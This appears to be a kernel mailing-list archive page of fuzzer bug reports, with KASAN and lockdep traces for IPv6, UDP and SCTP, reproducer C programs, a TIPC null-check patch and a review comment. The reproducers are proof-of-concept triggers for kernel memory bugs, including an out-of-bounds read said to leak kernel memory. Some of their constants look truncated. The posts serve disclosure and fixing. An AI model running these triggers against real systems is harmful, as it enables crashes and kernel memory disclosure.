net/ipv4/af_inet.c:530 [] SYSC_connect+0x23e/0x2e0 net/socket.c:1533 [] SyS_connect+0x24/0x30 net/socket.c:1514 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Object at 88002f3fe1c0, in cache UDPv6 size: 1496 Allocated: PID = 11149 [ 1921.980207] [] save_stack_trace+0x16/0x20 [ 1921.980207] [] save_stack+0x46/0xd0 [ 1921.980207] [] kasan_kmalloc+0xad/0xe0 [ 1921.980207] [] kasan_slab_alloc+0x12/0x20 [ 1921.980207] [< inline >] slab_post_alloc_hook mm/slab.h:417 [ 1921.980207] [< inline >] slab_alloc_node mm/slub.c:2708 [ 1921.980207] [< inline >] slab_alloc mm/slub.c:2716 [ 1921.980207] [] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721 [ 1921.980207] [] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326 [ 1921.980207] [] sk_alloc+0x38/0xae0 
net/core/sock.c:1388 [ 1921.980207] [] inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182 [ 1921.980207] [] __sock_create+0x37b/0x640 net/socket.c:1153 [ 1921.980207] [< inline >] sock_create net/socket.c:1193 [ 1921.980207] [< inline >] SYSC_socket net/socket.c:1223 [ 1921.980207] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 [ 1921.980207] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 11157 [ 1921.980207] [] save_stack_trace+0x16/0x20 [ 1921.980207] [] save_stack+0x46/0xd0 [ 1921.980207] [] kasan_slab_free+0x71/0xb0 [ 1921.980207] [< inline >] slab_free_hook mm/slub.c:1352 [ 1921.980207] [< inline >] slab_free_freelist_hook mm/slub.c:1374 [ 1921.980207] [< inline >] slab_free mm/slub.c:2951 [ 1921.980207] [] kmem_cache_free+0xc8/0x330 mm/slub.c:2973 [ 1921.980207] [< inline >] sk_prot_free net/core/sock.c:1369 [ 1921.980207] [] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444 [ 1921.980207] [] sk_destruct+0x44/0x80 net/core/sock.c:1452 [ 1921.980207] [] __sk_free+0x53/0x220 net/core/sock.c:1460 [ 1921.980207] [] sk_free+0x23/0x30 net/core/sock.c:1471 [ 1921.980207] [] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589 [ 1921.980207] [] udp_lib_close+0x15/0x20 ./include/net/udp.h:203 [ 1921.980207] [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 [ 1921.980207] [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 [ 1921.980207] [] sock_release+0x8d/0x1d0 net/socket.c:570 [ 1921.980207] [] sock_close+0x16/0x20 net/socket.c:1017 [ 1921.980207] [] __fput+0x28c/0x780 fs/file_table.c:208 [ 1921.980207] [] fput+0x15/0x20 fs/file_table.c:244 [ 1921.980207] [] task_work_run+0xf9/0x170 [ 1921.980207] [] do_exit+0x85e/0x2a00 [ 1921.980207] [] do_group_exit+0x108/0x330 [ 1921.980207] [] get_signal+0x617/0x17a0 kernel/signal.c:2307 [ 1921.980207] [] do_signal+0x7f/0x18f0 [ 1921.980207] [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 [ 1921.980207] [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [ 1921.980207] [] 
syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259
[ 1921.980207] [] entry_SYSCALL_64_fastpath+0xc4/0xc6
Memory state around the buggy address:
 88002f3fe080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 88002f3fe100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>88002f3fe180: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
                                                   ^
 88002f3fe200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 88002f3fe280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
Thanks && Best Regards,
Baozeng Ding
BUG: KASAN: use-after-free in udp_lib_get_port
Hello all, While running syzkaller fuzzer I have got the following use-after-free bug in udp_lib_get_port. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. BUG: KASAN: use-after-free in udp_lib_get_port+0x1573/0x1860 at addr 88000804cb60 Write of size 8 by task syz-executor/31190 CPU: 0 PID: 31190 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 880015ac7a48 829f835b 880032b531c0 88000804cb40 88000804d250 880017415a4a 880015ac7a70 8174d3cc 880015ac7b00 88000804cb00 880032b531c0 880015ac7af0 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 [< inline >] print_address_description mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 [< inline >] kasan_report mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329 [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 [] udp_lib_get_port+0x1573/0x1860 net/ipv4/udp.c:345 [] udp_v6_get_port+0xa7/0xd0 net/ipv6/udp.c:106 [] inet6_bind+0x89c/0xfb0 net/ipv6/af_inet6.c:384 [] SYSC_bind+0x1ea/0x250 net/socket.c:1367 [] SyS_bind+0x24/0x30 net/socket.c:1353 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Object at 88000804cb40, in cache UDPv6 size: 1496 Allocated: PID = 30789 [ 378.305168] [] save_stack_trace+0x16/0x20 [ 378.305168] [] save_stack+0x46/0xd0 [ 378.305168] [] kasan_kmalloc+0xad/0xe0 [ 378.305168] [] kasan_slab_alloc+0x12/0x20 [ 378.305168] [< inline >] slab_post_alloc_hook mm/slab.h:417 [ 378.305168] [< inline >] slab_alloc_node mm/slub.c:2708 [ 378.305168] [< inline >] slab_alloc mm/slub.c:2716 [ 378.305168] [] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721 [ 378.305168] [] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326 [ 378.305168] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 [ 378.305168] [] 
inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182 [ 378.305168] [] __sock_create+0x37b/0x640 net/socket.c:1153 [ 378.305168] [< inline >] sock_create net/socket.c:1193 [ 378.305168] [< inline >] SYSC_socket net/socket.c:1223 [ 378.305168] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 [ 378.305168] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 30789 [ 378.305168] [] save_stack_trace+0x16/0x20 [ 378.305168] [] save_stack+0x46/0xd0 [ 378.305168] [] kasan_slab_free+0x71/0xb0 [ 378.305168] [< inline >] slab_free_hook mm/slub.c:1352 [ 378.305168] [< inline >] slab_free_freelist_hook mm/slub.c:1374 [ 378.305168] [< inline >] slab_free mm/slub.c:2951 [ 378.305168] [] kmem_cache_free+0xc8/0x330 mm/slub.c:2973 [ 378.305168] [< inline >] sk_prot_free net/core/sock.c:1369 [ 378.305168] [] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444 [ 378.305168] [] sk_destruct+0x44/0x80 net/core/sock.c:1452 [ 378.305168] [] __sk_free+0x53/0x220 net/core/sock.c:1460 [ 378.305168] [] sk_free+0x23/0x30 net/core/sock.c:1471 [ 378.305168] [] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589 [ 378.305168] [] udp_lib_close+0x15/0x20 ./include/net/udp.h:203 [ 378.305168] [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 [ 378.305168] [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 [ 378.305168] [] sock_release+0x8d/0x1d0 net/socket.c:570 [ 378.305168] [] sock_close+0x16/0x20 net/socket.c:1017 [ 378.305168] [] __fput+0x28c/0x780 fs/file_table.c:208 [ 378.305168] [] fput+0x15/0x20 fs/file_table.c:244 [ 378.305168] [] task_work_run+0xf9/0x170 [ 378.305168] [] do_exit+0x85e/0x2a00 [ 378.305168] [] do_group_exit+0x108/0x330 [ 378.376437] [] get_signal+0x617/0x17a0 kernel/signal.c:2307 [ 378.376437] [] do_signal+0x7f/0x18f0 [ 378.376437] [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 [ 378.376437] [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [ 378.376437] [] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259 [ 378.376437] [] 
entry_SYSCALL_64_fastpath+0xc4/0xc6 Memory state around the buggy address: 88000804ca00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88000804ca80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88000804cb00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 88000804cb80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88000804cc00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ========== Thanks && Best Regards, Baozeng Ding
net/ipv6: potential deadlock in do_ipv6_setsockopt
Hello, While running syzkaller fuzzer I have got the following deadlock report. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. === [ INFO: possible circular locking dependency detected ] 4.8.0+ #39 Not tainted --- syz-executor/21301 is trying to acquire lock: ([ 165.136033] rtnl_mutex [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 but task is already holding lock: ([ 165.136033] sk_lock-AF_INET6 [] do_ipv6_setsockopt.isra.7+0x1f1/0x2960 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: : [ 165.136033] [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [ 165.136033] [] lock_sock_nested+0xcb/0x120 net/core/sock.c:2493 [ 165.136033] [] do_ipv6_setsockopt.isra.7+0x268/0x2960 [ 165.136033] [] ipv6_setsockopt+0x9b/0x140 [ 165.136033] [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [ 165.136033] [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [ 165.136033] [< inline >] SYSC_setsockopt net/socket.c:1742 [ 165.136033] [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [ 165.136033] [] entry_SYSCALL_64_fastpath+0x23/0xc6 : [ 165.136033] [< inline >] check_prev_add kernel/locking/lockdep.c:1829 [ 165.136033] [< inline >] check_prevs_add kernel/locking/lockdep.c:1939 [ 165.136033] [< inline >] validate_chain kernel/locking/lockdep.c:2266 [ 165.136033] [] __lock_acquire+0x35a9/0x4bc0 kernel/locking/lockdep.c:3335 [ 165.136033] [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [ 165.136033] [< inline >] __mutex_lock_common kernel/locking/mutex.c:521 [ 165.136033] [] mutex_lock_nested+0xb1/0x860 kernel/locking/mutex.c:621 [ 165.136033] [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 [ 165.136033] [] ipv6_sock_mc_close+0xfe/0x350 net/ipv6/mcast.c:288 [ 165.136033] [] do_ipv6_setsockopt.isra.7+0x22fc/0x2960 [ 165.136033] [] ipv6_setsockopt+0x9b/0x140 [ 165.136033] [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [ 
165.136033] [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [ 165.136033] [< inline >] SYSC_setsockopt net/socket.c:1742 [ 165.136033] [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [ 165.136033] [] entry_SYSCALL_64_fastpath+0x23/0xc6 other info that might help us debug this: Possible unsafe locking scenario: CPU0CPU1 lock([ 165.136033] sk_lock-AF_INET6 ); lock([ 165.136033] rtnl_mutex ); lock([ 165.136033] sk_lock-AF_INET6 ); lock([ 165.136033] rtnl_mutex ); *** DEADLOCK *** 1 lock held by syz-executor/21301: #0: [ 165.136033] ( stack backtrace: CPU: 1 PID: 21301 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 880017217580 829f835b 88d65790 88d65790 88dc6b70 880016f41fd8 8800172175d0 8141df18 880016f41ffa dc00 8764c180 880016f41fd8 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] print_circular_bug+0x288/0x340 kernel/locking/lockdep.c:1202 [< inline >] check_prev_add kernel/locking/lockdep.c:1829 [< inline >] check_prevs_add kernel/locking/lockdep.c:1939 [< inline >] validate_chain kernel/locking/lockdep.c:2266 [] __lock_acquire+0x35a9/0x4bc0 kernel/locking/lockdep.c:3335 [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [< inline >] __mutex_lock_common kernel/locking/mutex.c:521 [] mutex_lock_nested+0xb1/0x860 kernel/locking/mutex.c:621 [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 [] ipv6_sock_mc_close+0xfe/0x350 net/ipv6/mcast.c:288 [] do_ipv6_setsockopt.isra.7+0x22fc/0x2960 [] ipv6_setsockopt+0x9b/0x140 [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [< inline >] SYSC_setsockopt net/socket.c:1742 [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Thanks && Best Regards, Baozeng Ding
Re: net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
Hello Xin Long, On 2016/10/14 19:13, Xin Long wrote: > On Sat, Aug 20, 2016 at 3:51 PM, Baozeng Ding wrote: >> Hello all, >> The following program triggers stack-out-of-bounds in memcmp. The kernel >> version is 4.8.0-rc1+ (on Aug 13 commit >> 118253a593bd1c57de2d1193df1ccffe1abe745b). Thanks. > ... >> >> #define _GNU_SOURCE >> #include >> #include >> #include >> #include >> #include >> #include >> #include >> #include >> >> int main() >> { >> int fd; >> mmap((void *)0x2000ul, 0xff2000ul, 0x3ul, 0x32ul, -1, 0x0ul); >> fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_SCTP); >> memcpy((void*)0x20f82f80, >> "\x0a\x00\xab\x12\x72\xd4\x19\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\xda\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >> 128); >> bind(fd, (struct sockaddr*)0x20f82f80ul, 0x80ul); >> *(uint64_t*)0x202e1fc8 = (uint64_t)0x20f77f80; >> *(uint32_t*)0x202e1fd0 = (uint32_t)0x80; >> *(uint64_t*)0x202e1fd8 = (uint64_t)0x20f7dfe0; >> *(uint64_t*)0x202e1fe0 = (uint64_t)0x2; >> *(uint64_t*)0x202e1fe8 = (uint64_t)0x20f77000; >> *(uint64_t*)0x202e1ff0 = (uint64_t)0x3; >> *(uint32_t*)0x202e1ff8 = (uint32_t)0x80; >> memcpy((void*)0x20f77f80, >> 
"\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >> 128); >> *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; >> *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; >> *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; >> *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; >> memcpy((void*)0x20f77fc5, >> "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", >> 59); >> memcpy((void*)0x20f77fac, >> "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", >> 84); >> *(uint64_t*)0x20f77000 = (uint64_t)0x15; >> *(uint32_t*)0x20f77008 = (uint32_t)0x1; >> *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; >> *(uint8_t*)0x20f77010 = (uint8_t)0xbb; >> *(uint8_t*)0x20f77011 = (uint8_t)0x2; >> *(uint8_t*)0x20f77012 = (uint8_t)0x5; >> *(uint8_t*)0x20f77013 = (uint8_t)0x2; >> *(uint8_t*)0x20f77014 = (uint8_t)0x8000; >> *(uint64_t*)0x20f77015 = (uint64_t)0x10; >> *(uint32_t*)0x20f7701d = (uint32_t)0x; >> *(uint32_t*)0x20f77021 = (uint32_t)0x1; >> *(uint64_t*)0x20f77025 = (uint64_t)0x13; >> *(uint32_t*)0x20f7702d = (uint32_t)0x6; >> *(uint32_t*)0x20f77031 = (uint32_t)0xfe00; >> 
*(uint8_t*)0x20f77035 = (uint8_t)0x8000; >> *(uint8_t*)0x20f77036 = (uint8_t)0xfff8; >> sendmmsg(fd, (struct mmsghdr *)0x202e1fc8ul, 0x1ul, 0x1ul); >> return 0; >> } >> > Hi, Baozeng, I couldn't reproduce this issue with this script, > even in 118253a593bd1c57de2d1193df1ccffe1abe745b > do I need to do some extra config for this ? > You need to enable KASAN in the kernel config. CONFIG_HAVE_ARCH_KASAN=y CONFIG_KASAN=y CONFIG_KASAN_INLINE=y CONFIG_KASAN_SHADOW_OFFSET=0xdc00 I just tested with b67be92feb486f800d80d72c67fd87b47b79b18e (October 12) and it still exists. If you still cannot reproduce it, I will send the .config to you privately. Thanks.
BUG: net/ipv6: kernel memory leak in ip6_datagram_recv_specific_ctl
Hi all, The following program triggers use-after-free in ip6_datagram_recv_specific_ctl, which may leak kernel memory. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). == BUG: KASAN: use-after-free in ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 at addr 880029c84ec8 Read of size 1 by task poc/25548 Call Trace: [] dump_stack+0x12e/0x185 /lib/dump_stack.c:15 [< inline >] print_address_description /mm/kasan/report.c:204 [] kasan_report_error+0x48b/0x4b0 /mm/kasan/report.c:283 [< inline >] kasan_report /mm/kasan/report.c:303 [] __asan_report_load1_noabort+0x3e/0x40 /mm/kasan/report.c:321 [] ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 /net/ipv6/datagram.c:687 [] ip6_datagram_recv_ctl+0x33/0x40 [] do_ipv6_getsockopt.isra.4+0xaec/0x2150 [] ipv6_getsockopt+0x116/0x230 [] tcp_getsockopt+0x82/0xd0 /net/ipv4/tcp.c:3035 [] sock_common_getsockopt+0x95/0xd0 /net/core/sock.c:2647 [< inline >] SYSC_getsockopt /net/socket.c:1776 [] SyS_getsockopt+0x142/0x230 /net/socket.c:1758 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Memory state around the buggy address: 880029c84d80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 880029c84e00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff > 880029c84e80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ^ 880029c84f00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 880029c84f80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff == #include #include #include #include #include #include #include #include #include #define IPV6_2292DSTOPTS4 #define IPV6_2292PKTOPTIONS 6 #define IPV6_FLOWINFO 11 int main() { int fd; int i, r; int opt = 1, len = 0; struct msghdr msg; struct sockaddr_in6 addr; int sub_addr[4]; struct iovec iov; memset(sub_addr, 0, sizeof(sub_addr)); sub_addr[3] = 0x100; memcpy(&addr.sin6_addr, sub_addr, sizeof(sub_addr)); addr.sin6_family = AF_INET6; addr.sin6_port = 0x10ab; addr.sin6_flowinfo = 0x1; addr.sin6_scope_id = 0; mmap(0x2000ul, 0x1c000ul, 0x3ul, 0x32ul, -1, 0x0ul, 0, 0, 0); memset(0x2000, 
'a', 0x1c000); fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); bind(fd, &addr, sizeof(addr)); setsockopt(fd, IPPROTO_IPV6, IPV6_2292DSTOPTS, &opt, 4); setsockopt(fd, IPPROTO_IPV6, IPV6_FLOWINFO, &opt, 4); addr.sin6_flowinfo = 0; addr.sin6_scope_id = 0; msg.msg_name = &addr; msg.msg_namelen = sizeof(addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_iov->iov_base = 0x2000; msg.msg_iov->iov_len = 0x100; msg.msg_control = 0x2000; msg.msg_controllen = 0x100; msg.msg_flags = 0; r = sendmsg(fd, &msg, MSG_FASTOPEN); if (r < 0) { printf("sendmsg errno=%d\n", r); } r = getsockopt(fd, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0x20012000ul, &len); if (r < 0) printf("getsockopt error\n"); return 0; } The following lines cause an out-of-bounds read, which may leak kernel memory through put_cmsg. 686 u8 *ptr = nh + opt->dst0; // Out-of-bouds when opt->dst0 is large. 687 put_cmsg(msg, SOL_IPV6, IPV6_2292DSTOPTS, (ptr[1]+1)<<3, ptr); I debugged using printk and got the following values of opt, which may help locate the root cause of the bug. Thanks. [85564.842733] degug: opt->iif is 0xe111121c [85564.842737] degug: opt->ra is 0x121c [85564.842741] degug: opt->dst0 is 0xe111 Best Regards, Baozeng Ding
net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
0; memcpy((void*)0x20f77f80, "\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128); *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; memcpy((void*)0x20f77fc5, "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", 59); memcpy((void*)0x20f77fac, "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", 84); *(uint64_t*)0x20f77000 = (uint64_t)0x15; *(uint32_t*)0x20f77008 = (uint32_t)0x1; *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; *(uint8_t*)0x20f77010 = (uint8_t)0xbb; *(uint8_t*)0x20f77011 = (uint8_t)0x2; *(uint8_t*)0x20f77012 = (uint8_t)0x5; *(uint8_t*)0x20f77013 = (uint8_t)0x2; *(uint8_t*)0x20f77014 = (uint8_t)0x8000; *(uint64_t*)0x20f77015 = (uint64_t)0x10; *(uint32_t*)0x20f7701d = (uint32_t)0x; *(uint32_t*)0x20f77021 = (uint32_t)0x1; *(uint64_t*)0x20f77025 = (uint64_t)0x13; *(uint32_t*)0x20f7702d = (uint32_t)0x6; *(uint32_t*)0x20f77031 = (uint32_t)0xfe00; *(uint8_t*)0x20f77035 = (uint8_t)0x8000; *(uint8_t*)0x20f77036 = 
(uint8_t)0xfff8; sendmmsg(fd, (struct mmsghdr *)0x202e1fc8ul, 0x1ul, 0x1ul); return 0; } Best Regards, Baozeng Ding
[PATCH] tipc: fix potential null pointer dereference in the nla_data function
Before calling the nla_data function, make sure the argument is not null. Fix potential null pointer dereference vulnerability for this. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 12 1 file changed, 12 insertions(+) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index f795b1d..efbba26 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -356,6 +356,9 @@ static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!bearer[TIPC_NLA_BEARER_NAME]) + return -EINVAL; + return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), nla_len(bearer[TIPC_NLA_BEARER_NAME])); @@ -492,6 +495,9 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!link[TIPC_NLA_LINK_NAME]) + return -EINVAL; + name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) return 0; @@ -602,6 +608,9 @@ static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!link[TIPC_NLA_LINK_NAME]) + return -EINVAL; + link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); strcpy(link_info.str, nla_data(link[TIPC_NLA_LINK_NAME])); @@ -981,6 +990,9 @@ static int tipc_nl_compat_media_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!media[TIPC_NLA_MEDIA_NAME]) + return -EINVAL; + return tipc_add_tlv(msg->rep, TIPC_TLV_MEDIA_NAME, nla_data(media[TIPC_NLA_MEDIA_NAME]), nla_len(media[TIPC_NLA_MEDIA_NAME])); -- 1.9.1
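Review bot: The presence checks added in all four hunks (bearer_dump, link_stat_dump, link_dump, media_dump) stop the NULL dereference, but a non-NULL attribute says nothing about the length or termination of its payload, and the link_dump hunk goes on to `strcpy(link_info.str, nla_data(link[TIPC_NLA_LINK_NAME]));` with no bound on the copy while link_stat_dump hands the same payload to `strcmp()`. Whether nla_parse_nested validated the name as a NUL-terminated string depends on the policy it was called with, which is not visible in these hunks; the other tipc postings on this page show it being called with a NULL policy, so I would not rely on it. For link_dump a bounded copy, `nla_strlcpy(link_info.str, link[TIPC_NLA_LINK_NAME], sizeof(link_info.str));`, removes the dependency; for the strcmp callers an NLA_NUL_STRING policy entry with a `.len` is the usual way to obtain the guarantee. Each of the four functions continues outside its hunk.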
Re: BUG: net/netlink: KASAN: use-after-free in netlink_sock_destruct
